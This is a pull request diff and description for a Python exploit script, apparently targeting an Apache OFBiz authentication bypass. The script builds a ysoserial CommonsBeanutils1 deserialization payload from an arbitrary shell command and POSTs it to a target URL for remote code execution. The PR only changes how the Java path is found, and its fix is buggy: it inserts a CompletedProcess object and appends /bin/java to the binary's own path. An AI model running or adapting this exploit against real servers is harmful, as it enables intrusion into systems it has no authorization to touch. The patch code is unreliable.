### PR TITLE
FIX : taking java path from command instead of env

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -109,7 +109,8 @@ def main():
     if args.cmd is None:
         scan(url)
     else:
-        command = f"{os.environ['JAVA_HOME']}/bin/java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"
+        java_path = subprocess.run(['which', 'java'], capture_output=True, text=True)
+        command = f"{java_path}/bin/java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"
         encoded_output = get_encoded_payload(command)
         send_post_request(url, encoded_output)
 


### PR DESCRIPTION
removing the env variable  `JAVA_HOME` because it is not present in all installations of java so its batter to get the location by a which command otherwise it will give an error
```sh
Traceback (most recent call last):
  File "/home/kali/Apache-OFBiz-Authentication-Bypass/exploit.py", line 117, in <module>
    main()
  File "/home/kali/Apache-OFBiz-Authentication-Bypass/exploit.py", line 112, in main
    command = f"{os.environ['JAVA_HOME']}/bin/java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"
                 ~~~~~~~~~~^^^^^^^^^^^^^
  File "<frozen os>", line 679, in __getitem__
KeyError: 'JAVA_HOME'
```